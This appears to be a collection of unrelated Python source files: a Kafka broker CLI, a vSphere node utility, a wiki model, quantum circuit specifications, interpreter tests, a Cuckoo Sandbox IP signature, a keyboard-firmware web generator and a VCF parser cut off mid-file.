throttle: int, remove_throttle: bool):
if throttle and throttle < get_max_bytes_in():
print('Throttle value must be set above the max BytesIn for the replication to progress. '
'The current max BytesIn is {}'.format(get_max_bytes_in()))
exit(1)
config, env_provider = prepare_configs()
with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
if remove_throttle:
return RebalanceThrottleManager.remove_all_throttle_configurations(zookeeper)
empty_brokers_list = [] if empty_brokers is None else empty_brokers.split(',')
exclude_topics_list = [] if exclude_topics is None else exclude_topics.split(',')
__check_all_broker_ids_exist(empty_brokers_list, zookeeper)
broker_id = get_opt_broker_id(broker, config, zookeeper, env_provider) if broker else None
RemoteCommandExecutorCheck.register_rebalance(zookeeper, broker_id, empty_brokers_list,
exclude_topics_list, parallelism, bin_packing, throttle)
@cli.command('migrate', help='Replace one broker with another for all partitions')
@click.option('--from', 'from_', type=click.STRING, callback=__validate_not_empty,
help='List of brokers to migrate from (separated with ",")')
@click.option('--to', type=click.STRING, callback=__validate_not_empty,
help='List of brokers to migrate to (separated with ",")')
@click.option('--shrink', is_flag=True, default=False, show_default=True,
help='Whether or not to shrink replaced broker ids form partition assignment')
@click.option('--broker', type=click.STRING, help='Optional broker id to execute check on')
@click.option('--throttle', type=click.INT, default=100000000, help="Upper bound on bandwidth (in bytes/sec) used for "
"reassigning partitions")
@click.option('--parallelism', type=click.INT, show_default=True, default=1,
help="Amount of partitions to move in a single migration step")
@click.option('--remove-throttle', is_flag=True, help="Don't trigger rebalance but remove throttling "
"configuration from all the brokers and topics")
def migrate_broker(from_: str, to: str, shrink: bool, broker: str, throttle: int, parallelism: int,
remove_throttle: bool):
config, env_provider = prepare_configs()
with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
if remove_throttle:
return RebalanceThrottleManager.remove_all_throttle_configurations(zookeeper)
broker_id = get_opt_broker_id(broker, config, zookeeper, env_provider) if broker else None
RemoteCommandExecutorCheck.register_migration(zookeeper, from_.split(','), to.split(','), shrink, broker_id,
throttle, parallelism)
@cli.command('swap_fat_slim', help='Move one partition from fat broker to slim one')
@click.option('--threshold', type=click.INT, default="100000", show_default=True, help="Threshold in kb to run swap")
def swap_partitions(threshold: int):
config, env_provider = prepare_configs()
with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
RemoteCommandExecutorCheck.register_fatboy_slim(zookeeper, threshold_kb=threshold)
@cli.group(name='actions', help='Work with running actions')
def actions():
pass
@actions.command('list', help='List all the actions on broker(s)')
@click.option('--broker', type=click.STRING,
help='Broker id to list actions on. By default all brokers are enumerated')
def list_actions(broker: str):
table = []
config, env_provider = prepare_configs()
for broker_id, address in _list_broker_addresses(config, env_provider, broker):
try:
response = requests.get('http://{}:{}/api/controller/queue'.format(address, config.health_port))
except Exception as e:
print('Failed to query information on {} ({})'.format(broker_id, address))
_LOG.error('Failed to query information on {} ({})'.format(broker_id, address), exc_info=e)
continue
line = {
'_broker_id': broker_id,
'_broker_address': address,
}
if response.status_code != 200:
line['error'] = _extract_error(response)
table.append(line)
else:
changes = response.json()
if not changes:
line.update({
'type': None,
'description': None,
'running': None
})
table.append(line)
else:
for change in changes:
line_copy = dict(line)
line_copy.update(change)
table.append(line_copy)
if not table:
print('No brokers found')
else:
_print_table(table)
@actions.command('delete', help='Remove all actions of specified type on broker(s)')
@click.option('--action', type=click.STRING,
help='Action to delete')
@click.option('--broker', type=click.STRING,
help='Broker id to delete actions on. By default actions are deleted on all brokers')
def delete_actions(action: str, broker: str):
if not action:
print('No action specified. Please specify it')
config, env_provider = prepare_configs()
for broker_id, address in _list_broker_addresses(config, env_provider, broker):
try:
response = requests.delete(
'http://{}:{}/api/controller/queue/{}'.format(address, config.health_port, action))
except Exception as e:
print('Failed to query information on {} ({})'.format(broker_id, address))
_LOG.error('Failed to query information on {} ({})'.format(broker_id, address), exc_info=e)
continue
if response.status_code not in (200, 204):
print('Failed to delete action from {} ({}): {}'.format(broker, address, _extract_error(response)))
else:
print('Removed action {} from {} ({})'.format(action, broker_id, address))
def _extract_error(response: Response):
try:
return response.json()['message']
except Exception as e:
_LOG.error('Failed to parse response message', exc_info=e)
return response.text()
def _list_broker_addresses(config, env_provider, broker):
with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
for broker_id in zookeeper.get_broker_ids():
if broker and broker != broker_id:
continue
yield broker_id, zookeeper.get_broker_address(broker_id)
@cli.command('stats', help='Display statistics about brokers')
def show_stats():
config, env_provider = prepare_configs()
with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
disk_stats = zookeeper.get_disk_stats()
table = []
for broker_id in zookeeper.get_broker_ids():
disk = disk_stats.get(broker_id, {}).get('disk') if disk_stats else {}
table.append({
'Broker Id': broker_id,
'Address': zookeeper.get_broker_address(broker_id),
'Free kb': disk.get('free_kb'),
'Used kb': disk.get('used_kb')
})
_print_table(table)
@cli.group(name='validate', help='Validates internal structures of kafka/zk')
def validate():
pass
@validate.command('replication', help='Returns all partitions whose ISR size differs from the replication factor or '
'have not registered broker ids')
@click.option('--factor', type=click.INT, default=3, show_default=True, help='Replication factor')
def validate_replication(factor: int):
config, env_provider = prepare_configs()
with load_exhibitor_proxy(env_provider.get_address_provider(), config.zk_prefix) as zookeeper:
brokers = {int(x) for x in zookeeper.get_broker_ids()}
table = []
for topic_name, partition, state in zookeeper.load_partition_states():
if len(state['isr']) != factor or not set(state['isr']).issubset(brokers):
table.append({
'Partition': partition,
'Topic': topic_name,
'State': state
})
if table:
_LOG.info('Invalid topics:')
_print_table(table)
else:
print('All replica lists look valid')
if __name__ == '__main__':
cli()
|
#
# Copyright (c) 2016 Nutanix Inc. All rights reserved.
#
from curie.node_util import NodeUtil
class GenericVsphereNodeUtil(NodeUtil):
@classmethod
def _use_handler(cls, node):
"""Returns True if 'node' should use this class as its handler."""
software_info = node.cluster().metadata().cluster_software_info
mgmt_info = node.cluster().metadata().cluster_management_server_info
return (software_info.HasField("generic_info") and
mgmt_info.HasField("vcenter_info"))
def __init__(self, node):
self.__node = node
self.__cluster_metadata = self.__node.cluster().metadata()
self.__vcenter_info = \
self.__cluster_metadata.cluster_management_server_info.vcenter_info
def is_ready(self):
"""See 'NodeUtil.is_ready' documentation for further details.
For a generic vSphere node, check only that vCenter reports the node
is powered on.
"""
# Don't sync with oob, as this method is often polled.
return self.__node.is_powered_on_soft(sync_with_oob=False)
|
# -*- coding: utf-8 -*-
import datetime
import functools
import logging
from bleach import linkify
from bleach.callbacks import nofollow
import markdown
from markdown.extensions import codehilite, fenced_code, wikilinks
from modularodm import fields
from framework.forms.utils import sanitize
from framework.guid.model import GuidStoredObject
from website import settings
from website.addons.base import AddonNodeSettingsBase
from website.addons.wiki import utils as wiki_utils
from website.addons.wiki.settings import WIKI_CHANGE_DATE
from website.project.model import write_permissions_revoked
from .exceptions import (
NameEmptyError,
NameInvalidError,
NameMaximumLengthError,
)
logger = logging.getLogger(__name__)
class AddonWikiNodeSettings(AddonNodeSettingsBase):
def after_register(self, node, registration, user, save=True):
"""Copy wiki settings to registrations."""
clone = self.clone()
clone.owner = registration
if save:
clone.save()
return clone, None
def to_json(self, user):
return {}
@write_permissions_revoked.connect
def subscribe_on_write_permissions_revoked(node):
# Migrate every page on the node
for wiki_name in node.wiki_private_uuids:
wiki_utils.migrate_uuid(node, wiki_name)
def build_wiki_url(node, label, base, end):
return node.web_url_for('project_wiki_view', wname=label)
def validate_page_name(value):
value = (value or '').strip()
if not value:
raise NameEmptyError('Page name cannot be blank.')
if value.find('/') != -1:
raise NameInvalidError('Page name cannot contain forward slashes.')
if len(value) > 100:
raise NameMaximumLengthError('Page name cannot be greater than 100 characters.')
return True
def render_content(content, node):
html_output = markdown.markdown(
content,
extensions=[
wikilinks.WikiLinkExtension(
configs=[
('base_url', ''),
('end_url', ''),
('build_url', functools.partial(build_wiki_url, node))
]
),
fenced_code.FencedCodeExtension(),
codehilite.CodeHiliteExtension(
[('css_class', 'highlight')]
)
]
)
# linkify gets called after santize, because we're adding rel="nofollow"
# to <a> elements - but don't want to allow them for other elements.
sanitized_content = sanitize(html_output, **settings.WIKI_WHITELIST)
return sanitized_content
class NodeWikiPage(GuidStoredObject):
_id = fields.StringField(primary=True)
page_name = fields.StringField(validate=validate_page_name)
version = fields.IntegerField()
date = fields.DateTimeField(auto_now_add=datetime.datetime.utcnow)
is_current = fields.BooleanField()
content = fields.StringField(default='')
user = fields.ForeignField('user')
node = fields.ForeignField('node')
@property
def deep_url(self):
return '{}wiki/{}/'.format(self.node.deep_url, self.page_name)
@property
def url(self):
return '{}wiki/{}/'.format(self.node.url, self.page_name)
@property
def rendered_before_update(self):
return self.date < WIKI_CHANGE_DATE
def html(self, node):
"""The cleaned HTML of the page"""
sanitized_content = render_content(self.content, node=node)
try:
return linkify(
sanitized_content,
[nofollow, ],
)
except TypeError:
logger.warning('Returning unlinkified content.')
return sanitized_content
def raw_text(self, node):
""" The raw text of the page, suitable for using in a test search"""
return sanitize(self.html(node), tags=[], strip=True)
def get_draft(self, node):
"""
Return most recently edited version of wiki, whether that is the
last saved version or the most recent sharejs draft.
"""
db = wiki_utils.share_db()
sharejs_uuid = wiki_utils.get_sharejs_uuid(node, self.page_name)
doc_item = db['docs'].find_one({'_id': sharejs_uuid})
if doc_item:
sharejs_version = doc_item['_v']
sharejs_timestamp = doc_item['_m']['mtime']
sharejs_timestamp /= 1000 # Convert to appropriate units
sharejs_date = datetime.datetime.utcfromtimestamp(sharejs_timestamp)
if sharejs_version > 1 and sharejs_date > self.date:
return doc_item['_data']
return self.content
def save(self, *args, **kwargs):
rv = super(NodeWikiPage, self).save(*args, **kwargs)
if self.node:
self.node.update_search()
return rv
def rename(self, new_name, save=True):
self.page_name = new_name
if save:
self.save()
def to_json(self):
return {}
|
# Copyright 2019 Xanadu Quantum Technologies Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# The module docstring is in strawberryfields/circuitspecs/__init__.py
"""
**Module name:** :mod:`strawberryfields.circuitspecs.circuit_specs`
"""
from typing import List, Set, Dict, Union
import abc
import networkx as nx
import blackbird
from blackbird.utils import to_DiGraph
import strawberryfields.program_utils as pu
class CircuitSpecs(abc.ABC):
"""Abstract base class for describing circuit classes.
This class stores information about :term:`classes of quantum circuits <circuit class>`.
For some circuit classes (e.g, ones corresponding to physical hardware chips), the
specifications can be quite rigid. For other classes, e.g., circuits supported by a particular
simulator backend, the specifications can be more flexible and general.
Key ingredients in a specification include: the primitive gates supported by the circuit class,
the gates that can be decomposed to sequences of primitive gates, and the possible
topology/connectivity restrictions.
This information is used e.g., in :meth:`.Program.compile` for validation and compilation.
"""
short_name = ""
"""str: short name of the circuit class"""
@property
@abc.abstractmethod
def modes(self) -> Union[int, None]:
"""The number of modes supported by the circuit class.
If the circuit class supports arbitrary number of modes, set this to 0.
Returns:
int: number of supported modes
"""
@property
@abc.abstractmethod
def local(self) -> bool:
"""Whether the circuit class can be executed locally (i.e., within a simulator).
Returns:
bool: ``True`` if the circuit class supports local execution
"""
@property
@abc.abstractmethod
def remote(self) -> bool:
"""Whether the circuit class supports remote execution.
Returns:
bool: ``True`` if the circuit class supports remote execution
"""
@property
@abc.abstractmethod
def interactive(self) -> bool:
"""Whether the circuits in the class can be executed interactively, that is,
the registers in the circuit are not reset between engine executions.
Returns:
bool: ``True`` if the circuit supports interactive use
"""
@property
@abc.abstractmethod
def primitives(self) -> Set[str]:
"""The primitive set of quantum operations directly supported
by the circuit class.
Returns:
set[str]: the names of the quantum primitives the circuit class supports
"""
@property
@abc.abstractmethod
def decompositions(self) -> Dict[str, Dict]:
"""Quantum operations that are not quantum primitives for the
circuit class, but are supported via specified decompositions.
This should be of the form
.. code-block:: python
{'operation_name': {'option1': val, 'option2': val,...}}
For each operation specified in the dictionary, the
:meth:`.Operation.decompose` method will be called during
:class:`.Program` compilation, with keyword arguments
given by the dictionary value.
Returns:
dict[str, dict]: the quantum operations that are supported
by the circuit class via decomposition
"""
@property
def parameter_ranges(self) -> Dict[str, List[List[float]]]:
"""Allowed parameter ranges for supported quantum operations.
This property is optional.
Returns:
dict[str, list]: a dictionary mapping an allowed quantum operation
to a nested list of the form ``[[p0_min, p0_max], [p1_min, p0_max], ...]``.
where ``pi`` corresponds to the ``i`` th gate parameter
"""
return dict()
@property
def graph(self):
"""The allowed circuit topologies or connectivity of the class, modelled as a directed
acyclic graph.
This property is optional; if arbitrary topologies are allowed in the circuit class,
this will simply return ``None``.
Returns:
networkx.DiGraph: a directed acyclic graph
"""
if self.circuit is None:
return None
# returned DAG has all parameters set to 0
bb = blackbird.loads(self.circuit)
if bb.is_template():
params = bb.parameters
kwargs = {p: 0 for p in params}
# initialize the topology with all template
# parameters set to zero
topology = to_DiGraph(bb(**kwargs))
else:
topology = to_DiGraph(bb)
return topology
@property
def circuit(self):
"""A rigid circuit template that defines this circuit specification.
This property is optional. If arbitrary topologies are allowed in the circuit class,
**do not define this property**. In such a case, it will simply return ``None``.
If a backend device expects a specific template for the recieved Blackbird
script, this method will return the serialized Blackbird circuit in string
form.
Returns:
Union[str, None]: Blackbird program or template representing the circuit
"""
return None
def compile(self, seq, registers):
"""Class-specific circuit compilation method.
If additional compilation logic is required, child classes can redefine this method.
Args:
seq (Sequence[Command]): quantum circuit to modify
registers (Sequence[RegRefs]): quantum registers
Returns:
List[Command]: modified circuit
Raises:
CircuitError: the given circuit cannot be validated to belong to this circuit class
"""
# registers is not used here, but may be used if the method is overwritten pylint: disable=unused-argument
if self.graph is not None:
# check topology
DAG = pu.list_to_DAG(seq)
# relabel the DAG nodes to integers, with attributes
# specifying the operation name. This allows them to be
# compared, rather than using Command objects.
mapping = {i: n.op.__class__.__name__ for i, n in enumerate(DAG.nodes())}
circuit = nx.convert_node_labels_to_integers(DAG)
nx.set_node_attributes(circuit, mapping, name="name")
def node_match(n1, n2):
"""Returns True if both nodes have the same name"""
return n1["name"] == n2["name"]
# check if topology matches
if not nx.is_isomorphic(circuit, self.graph, node_match):
# TODO: try and compile the program to match the topology
# TODO: add support for parameter range matching/compilation
raise pu.CircuitError(
"Program cannot be used with the CircuitSpec '{}' "
"due to incompatible topology.".format(self.short_name)
)
return seq
def decompose(self, seq):
"""Recursively decompose all gates in a given sequence, as allowed
by the circuit specification.
This method follows the directives defined in the
:attr:`~.CircuitSpecs.primitives` and :attr:`~.CircuitSpecs.decompositions`
class attributes to determine whether a command should be decomposed.
The order of precedence to determine whether decomposition
should be applied is as follows.
1. First, we check if the operation is in :attr:`~.CircuitSpecs.decompositions`.
If not, decomposition is skipped, and the operation is applied
as a primitive (if supported by the ``CircuitSpecs``).
2. Next, we check if (a) the operation supports decomposition, and (b) if the user
has explicitly requested no decomposition.
- If both (a) and (b) are true, the operation is applied
as a primitive (if supported by the ``CircuitSpecs``).
- Otherwise, we attempt to decompose the operation by calling
:meth:`~.Operation.decompose` recursively.
Args:
list[strawberryfields.program_utils.Command]: list of commands to
be decomposed
Returns:
list[strawberryfields.program_utils.Command]: list of compiled commands
for the circuit specification
"""
compiled = []
for cmd in seq:
op_name = cmd.op.__class__.__name__
if op_name in self.decompositions:
# target can implement this op decomposed
if hasattr(cmd.op, "decomp") and not cmd.op.decomp:
# user has requested application of the op as a primitive
if op_name in self.primitives:
compiled.append(cmd)
continue
else:
raise pu.CircuitError(
"The operation {} is not a primitive for the target '{}'".format(
cmd.op.__class__.__name__, self.short_name
)
)
try:
kwargs = self.decompositions[op_name]
temp = cmd.op.decompose(cmd.reg, **kwargs)
# now compile the decomposition
temp = self.decompose(temp)
compiled.extend(temp)
except NotImplementedError as err:
# Operation does not have _decompose() method defined!
# simplify the error message by suppressing the previous exception
raise err from None
elif op_name in self.primitives:
# target can handle the op natively
compiled.append(cmd)
else:
raise pu.CircuitError(
"The operation {} cannot be used with the target '{}'.".format(
cmd.op.__class__.__name__, self.short_name
)
)
return compiled
|
import ast
from types import FunctionType
from kanren import var
from tests.helpers import EvaloTestCase
class TestExpressions(EvaloTestCase):
def test_number_value_results_in_ast_number(self):
ret, _ = self.run_expr(var(), 1, eval_expr=True)
self.assertIsInstance(ret[0], ast.Num)
def test_number_value_results_in_maximum_number_of_possibilities(self):
ret, _ = self.run_expr(var(), 1, eval_expr=True)
self.assertEqual(len(ret), 5)
def test_asts_can_be_partially_filled_in(self):
ret, _ = self.run_expr(
ast.BinOp(left=ast.Num(n=1), op=ast.Add(), right=ast.Num(n=var())),
3,
eval_expr=True,
)
self.assertEqual(ret[0].right.n, 2)
def test_ast_addition_results_in_var_integer(self):
ret, _ = self.run_expr(
ast.BinOp(left=ast.Num(n=1), op=ast.Add(), right=ast.Num(n=1)), var()
)
self.assertEqual(ret[0], 2)
def test_ast_subtraction_results_in_var_integer(self):
ret, _ = self.run_expr(
ast.BinOp(left=ast.Num(n=1), op=ast.Sub(), right=ast.Num(n=1)), var()
)
self.assertEqual(ret[0], 0)
def test_ast_multiplication_results_in_var_integer(self):
ret, _ = self.run_expr(
ast.BinOp(left=ast.Num(n=2), op=ast.Mult(), right=ast.Num(n=1)), var()
)
self.assertEqual(ret[0], 2)
# Float is not yet supported
# def test_ast_division_results_in_var_integer(self):
# ret, _ = self.run_expr(ast.Expr(value=ast.BinOp(left=ast.Num(n=2), op=ast.Div(), right=ast.Num(n=1))), var())
# self.assertEqual(ret[0], 1)
def test_ast_modulo_results_in_var_integer(self):
ret, _ = self.run_expr(
ast.BinOp(left=ast.Num(n=3), op=ast.Mod(), right=ast.Num(n=2)), var()
)
self.assertEqual(ret[0], 1)
def test_ast_modulo_with_rhs_zero_is_not_picked_up(self):
ret, _ = self.run_expr(
ast.BinOp(left=ast.Num(n=3), op=ast.Mod(), right=ast.Num(n=0)), var()
)
self.assertEqual(len(ret), 0)
def test_ast_string_results_in_var_string(self):
ret, _ = self.run_expr(ast.Str(s="Hello world!"), var())
self.assertEqual(ret[0], "Hello world!")
# TODO: n=1 because otherwise it's very slow. Not sure why
def test_string_value_results_in_ast_string(self):
ret, _ = self.run_expr(var(), "Hello world!", eval_expr=True, n=1)
self.assertIn(type(ret[0]), [ast.Str, ast.Constant]) # Can be Constant in 3.8+
self.assertEqual(ret[0].s, "Hello world!")
def test_ast_name_results_in_lookup_from_env(self):
ret, _ = self.run_expr(ast.Name(id="x", ctx=ast.Load()), var(), env=[["x", 1]])
self.assertEqual(ret[0], 1)
def test_ast_lambda_without_args_results_in_function_type(self):
ret, _ = self.run_expr(ast.Lambda(args=[], body=ast.Num(n=1)), var(), env=[])
self.assertEqual(type(ret[0]), FunctionType)
def test_ast_call_with_lambda_results_in_function_call(self):
ret, _ = self.run_expr(
ast.Call(func=ast.Lambda(args=[], body=ast.Num(n=1)), args=[], keywords=[]),
var(),
env=[],
)
self.assertEqual(ret[0], 1)
def test_ast_empty_list_evaluates_to_empty_list(self):
ret, goals = self.run_expr(
ast_expr=ast.List(elts=[], ctx=ast.Load()),
value=var(),
)
self.assertEqual(ret[0], [])
def test_ast_single_element_list_is_correctly_interpreted(self):
ret, _ = self.run_expr(
ast_expr=ast.List(elts=[ast.Num(n=1)], ctx=ast.Load()),
value=var(),
maxdepth=4,
)
self.assertEqual(ret[0], [1])
def test_ast_multiple_element_list_is_correctly_interpreted(self):
ret, _ = self.run_expr(
ast_expr=ast.List(elts=[ast.Num(n=1), ast.Num(n=3)], ctx=ast.Load()),
value=var(),
maxdepth=4,
)
self.assertEqual(ret[0], [1, 3])
def test_ast_nested_list_is_correctly_interpreted(self):
ret, _ = self.run_expr(
ast_expr=ast.List(
elts=[ast.Num(n=2), ast.List(elts=[ast.Num(n=1)], ctx=ast.Load())],
ctx=ast.Load(),
),
value=var(),
maxdepth=4,
)
self.assertEqual(ret[0], [2, [1]])
def test_empty_list_can_be_reverse_interpreted(self):
ret, _ = self.run_expr(var(), [], eval_expr=True, n=3)
for r in ret:
v, _ = self.run_expr(r, var(), n=1)
self.assertEqual(v[0], [])
def test_filled_list_can_be_reverse_interpreted(self):
ret, _ = self.run_expr(var(), [1], eval_expr=True, n=3)
for r in ret:
v, _ = self.run_expr(r, var(), n=1)
self.assertEqual(v[0], [1])
|
# Copyright (C) 2010-2015 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# This signature was contributed by RedSocks - http://redsocks.nl
# See the file 'docs/LICENSE' for copying permission.
from lib.cuckoo.common.abstracts import Signature
class im_btb(Signature):
name = "im_btb"
description = "Connects to BitTorrent Bleepchat IP"
severity = 2
categories = ["im"]
authors = ["RedSocks"]
minimum = "2.0"
ipaddrs = [
"23.21.70.220",
"54.243.240.224",
"54.225.243.50",
"54.225.152.58",
"54.235.137.132",
"54.204.31.170",
"54.230.12.225",
"107.21.220.158",
"103.7.30.140",
"112.95.234.84",
"183.60.18.111",
"54.235.164.20",
]
def on_complete(self):
for indicator in self.ipaddrs:
if self.check_ip(pattern=indicator):
self.mark_ioc("ipaddr", indicator)
return self.has_marks()
|
# coding: utf8
import os, subprocess, datetime, fileinput
from flask import Flask, flash, request, redirect, url_for, send_from_directory
import common as kbd
KEYBOARDS = []
# import keyboard configurations and add them to app keyboard list
from keyboards.minivan import keyboard as minivan_rev1
KEYBOARDS.append(minivan_rev1)
from keyboards.minivan_rev3 import keyboard as minivan_rev3
KEYBOARDS.append(minivan_rev3)
from keyboards.roadkit import keyboard as roadkit
KEYBOARDS.append(roadkit)
from keyboards.transitvan import keyboard as transitvan
KEYBOARDS.append(transitvan)
from keyboards.provan import keyboard as provan
KEYBOARDS.append(provan)
from keyboards.minorca import keyboard as minorca
KEYBOARDS.append(minorca)
from keyboards.ergodox import keyboard as ergodox
KEYBOARDS.append(ergodox)
from keyboards.caravan import keyboard as caravan
KEYBOARDS.append(caravan)
from keyboards.lowwriter import keyboard as lowwriter
KEYBOARDS.append(lowwriter)
from keyboards.bananasplit import keyboard as bananasplit
KEYBOARDS.append(bananasplit)
app = Flask(__name__)
# Returns the file to download at the very end
@app.route('/downloads/<firmware>/<filename>')
def download_file(filename, firmware):
return send_from_directory("/app/tmk_keyboard/keyboard/{0}".format(firmware),
filename)
# This is our main routine. it allows GET and POST requests. If we get a GET request, we just send our template file
# to the browser (at the very end of the function) If it's a POST request, it means the browser already has our
# template and wants to send the values back to us. We do some sanity checks first to see if everything is ok The
# other steps we take will be explained right before everything.
@app.route('/', methods=['GET', 'POST'])
def main():
if request.method == 'POST':
#as soon as we get a POST request we remember the current time so we can crank out tons of configs at and every config has a unique name (1 request per second should be enough
#to not run into collisions at this time i hope ;))
now = str(datetime.datetime.now()).replace(' ', '-').replace(':', '-').split(".")[0]
#Here we take all POST parameters and stuff them into lists. One layer has one list.
keyboard_name = request.form.get('keyboard', '')
keyboard = None
for k in KEYBOARDS:
if k.name == keyboard_name:
keyboard = k
break
if keyboard is None:
return('error: no keyboard specified')
activeLayout = int(request.form.get('activeLayout', '0'))
hasZones = request.form.get('hasZones', 'false') == 'true'
layer1 = request.form.getlist('L1')
layer1types = request.form.getlist('LT1')
layer1mods = request.form.getlist('LM1')
layer2 = request.form.getlist('L2')
layer2types = request.form.getlist('LT2')
layer2mods = request.form.getlist('LM2')
layer3 = request.form.getlist('L3')
layer3types = request.form.getlist('LT3')
layer3mods = request.form.getlist('LM3')
layer4 = request.form.getlist('L4')
layer4types = request.form.getlist('LT4')
layer4mods = request.form.getlist('LM4')
layer5 = request.form.getlist('L5')
layer5types = request.form.getlist('LT5')
layer5mods = request.form.getlist('LM5')
layer6 = request.form.getlist('L6')
layer6types = request.form.getlist('LT6')
layer6mods = request.form.getlist('LM6')
layer7 = request.form.getlist('L7')
layer7types = request.form.getlist('LT7')
layer7mods = request.form.getlist('LM7')
layer8 = request.form.getlist('L8')
layer8types = request.form.getlist('LT8')
layer8mods = request.form.getlist('LM8')
layer9 = request.form.getlist('L9')
layer9types = request.form.getlist('LT9')
layer9mods = request.form.getlist('LM9')
layer10 = request.form.getlist('L10')
layer10types = request.form.getlist('LT10')
layer10mods = request.form.getlist('LM10')
layer11 = request.form.getlist('L11')
layer11types = request.form.getlist('LT11')
layer11mods = request.form.getlist('LM11')
layer12 = request.form.getlist('L12')
layer12types = request.form.getlist('LT12')
layer12mods = request.form.getlist('LM12')
layer13 = request.form.getlist('L13')
layer13types = request.form.getlist('LT13')
layer13mods = request.form.getlist('LM13')
layer14 = request.form.getlist('L14')
layer14types = request.form.getlist('LT14')
layer14mods = request.form.getlist('LM14')
layer15 = request.form.getlist('L15')
layer15types = request.form.getlist('LT15')
layer15mods = request.form.getlist('LM15')
layers = []
if layer1:
layers.append({'values': layer1, 'types': layer1types, 'mods': layer1mods})
if layer2:
layers.append({'values': layer2, 'types': layer2types, 'mods': layer2mods})
if layer3:
layers.append({'values': layer3, 'types': layer3types, 'mods': layer3mods})
if layer4:
layers.append({'values': layer4, 'types': layer4types, 'mods': layer4mods})
if layer5:
layers.append({'values': layer5, 'types': layer5types, 'mods': layer5mods})
if layer6:
layers.append({'values': layer6, 'types': layer6types, 'mods': layer6mods})
if layer7:
layers.append({'values': layer7, 'types': layer7types, 'mods': layer7mods})
if layer8:
layers.append({'values': layer8, 'types': layer8types, 'mods': layer8mods})
if layer9:
layers.append({'values': layer9, 'types': layer9types, 'mods': layer9mods})
if layer10:
layers.append({'values': layer10, 'types': layer10types, 'mods': layer10mods})
if layer11:
layers.append({'values': layer11, 'types': layer11types, 'mods': layer11mods})
if layer12:
layers.append({'values': layer12, 'types': layer12types, 'mods': layer12mods})
if layer13:
layers.append({'values': layer13, 'types': layer13types, 'mods': layer13mods})
if layer14:
layers.append({'values': layer14, 'types': layer14types, 'mods': layer14mods})
if layer15:
layers.append({'values': layer15, 'types': layer15types, 'mods': layer15mods})
if hasZones:
keys_per_layer = keyboard.get_num_keys(activeLayout)
template = keyboard.get_layout(activeLayout)
else:
keys_per_layer = keyboard.layouts[activeLayout]['num_keys']
template = keyboard.layouts[activeLayout]['layout']
for layer in layers:
if (len(layer['values']) != keys_per_layer):
return('error: some values are missing! please enter all information!')
layers, fn_actions = kbd.buildFnActions(layers)
for layer in layers:
layer = kbd.makeUpper(layer)
layer = kbd.translateList(layer)
if not(kbd.isAllowed(layer)):
return('error: there are invalid characters. please check your imput!<p>{0}</p>'.format(layer))
keymaps = kbd.buildKeyMaps(layers, template)
#We can now insert all the values we got into the template file we use. This point can 'propably' be improved still...
configfile = kbd.createTemplate(fn_actions, keymaps)
#As soon as we have the entire content of our config, we can write it into a file (with the timestamp we made right at the start!)
filename = "keymap_{0}_{1}.c".format(keyboard.firmware_folder, now)
callname = "{0}_{1}".format(keyboard.firmware_folder, now)
with open("/app/tmk_keyboard/keyboard/{0}/{1}".format(keyboard.firmware_folder, filename), "w+") as templatefile:
templatefile.write(configfile)
templatefile.close()
#everything is set up, now we just have to make our hex file with a system call
callstring = "make KEYMAP="+callname+" TARGETFILE="+callname+" > /dev/null"
subprocess.call(callstring, shell=True, cwd="/app/tmk_keyboard/keyboard/{0}/".format(keyboard.firmware_folder))
#everything is done, we have to return the hex file! :)
return redirect(url_for('download_file', filename=callname+'.hex', firmware=keyboard.firmware_folder))
#this is what happens on a GET request, we just send the index.htm file.
else:
return send_from_directory("/app/frontend/", "index.html")
|
#!/usr/bin/python3
# coding:UTF8
#----library-----#
import os.path
import os
import sys
import vcf
import json
import time
import copy
import errno
import verification_vcf
#---------------#
class VcfModel(object):
# CONTANTE
SAMPLE_NAME = "SAMPLE_NAME"
CONTIGS = "CONTIGS"
FORMAT = "FORMAT"
INFORMATION = "INFORMATIONS"
METADATA = "METADATA"
ANNOTATION = "ANNOTATION_?"
VARIANTS = "VARIANTS"
CHROM = "CHROM"
POS = "POS"
ID = "ID"
REF = "REF"
ALT = "ALT"
QUAL = "QUAL"
FILTER = "FILTER"
INFO = "INFO"
def __init__(self, vcf_file: str) -> None:
"""--Constructeur de notre Object---"""
#--------------------------------------------------------------------->
# Vérification du bon format fichier VCF afin de voir s'il est valide
vcf_a, vcf_header_a, vcf_columns_a = verification_vcf.read_vcf(vcf_file)
vcf_columns = ['CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT', 'DATA']
for col in vcf_columns:
if col not in vcf_columns_a:
vcf_a[col] = "."
list_header = verification_vcf.check_Vcf_Header(vcf_header_a)
list_tab_validation = ["##fileformat", "##fileDate", "##source", "##reference", "##contig"]
list_header2 = verification_vcf.separation_line(list_header[0])
dict_validation = {}
dict_non_validation = {}
for j in range (len(list_header2)) :
for k in range (len(list_tab_validation)):
if (list_header2[j].startswith(list_tab_validation[k])):
dict_validation[list_tab_validation[k]]= "Ok"
else :
dict_non_validation[list_tab_validation[k]] = "Pas Ok"
if len(dict_validation) >= 2 :
output_vcf = open(vcf_file)
self.vcf_reader = vcf.Reader(output_vcf)
else :
print ("Erreur de format de fichier : ",dict_non_validation, dict_validation)
#-------------------------------------------------------------------->
self.vcf_reader
self.metadata = dict
self.info = dict
self.format = dict
self.patient_name = str
self.dico_contig = dict
self.infos = dict
self.variants = dict
self.annotated = bool
self.source = "source"
# ---------Methode d'objet--------------------------------
self._extract_metadata()
self._variant_information()
self._extract_contig()
self._found_patient()
self._extract_info()
self._extract_format()
self._is_annotated()
output_vcf.close()
def _extract_contig(self):
""" method permettant l'extraction des CONTIGs
Parcours le dictionnaire des contigs du VCF, chaque clef étant le
